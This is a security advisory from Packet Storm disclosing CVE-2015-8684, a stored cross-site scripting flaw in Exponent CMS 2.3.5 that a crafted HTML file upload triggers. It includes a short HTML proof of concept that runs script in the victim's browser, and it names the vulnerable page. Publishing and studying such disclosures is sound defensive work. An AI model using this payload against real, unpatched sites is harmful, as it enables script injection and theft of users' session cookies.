Exponent CMS 2.3.5 File Upload Cross Site Scripting

2016-04-21T00:00:00
ID PACKETSTORM:136762
Type packetstorm
Reporter Sachin Wagh
Modified 2016-04-21T00:00:00

Description

                                        
                                            `CVE-2015-8684 - Exponent CMS 2.3.5 File Upload Cross Site Scripting  
Vulnerability  
  
  
Product : Exponent CMS  
  
CVE : CVE-2015-8684  
  
Author : Sachin Wagh  
Affected Version : Exponent CMS 2.3.5  
  
Fixed Version: Exponent CMS 2.3.7  
  
============================================================================  
Details:  
  
The Exponent CMS is prone to a cross-site scripting vulnerability because  
it fails to sufficiently sanitize user-supplied input.  
This issue occur when uploading crafted HTML file.  
  
An attacker may leverage this issue to execute arbitrary script code in the  
browser of an unsuspecting user in the context of the affected site. This  
may allow the attacker to steal cookie-based authentication credentials and  
to launch other attacks.  
  
============================================================================  
Proof-Of-Concept:  
  
<html>  
  
<head></head>  
  
<body>  
  
<div id="some-div">  
  
<script type="text/javascript">prompt(document.domain);</script>  
  
</div>  
  
</body>  
  
</html>  
  
============================================================================  
  
Affected Area(s):  
  
[+] http://localhost/exponent-2.3.5/navigation/edit_contentpage/parent/0  
  
============================================================================  
  
Credits & Authors :  
  
  
Sachin Wagh (@tiger_tigerboy)  
  
============================================================================  
`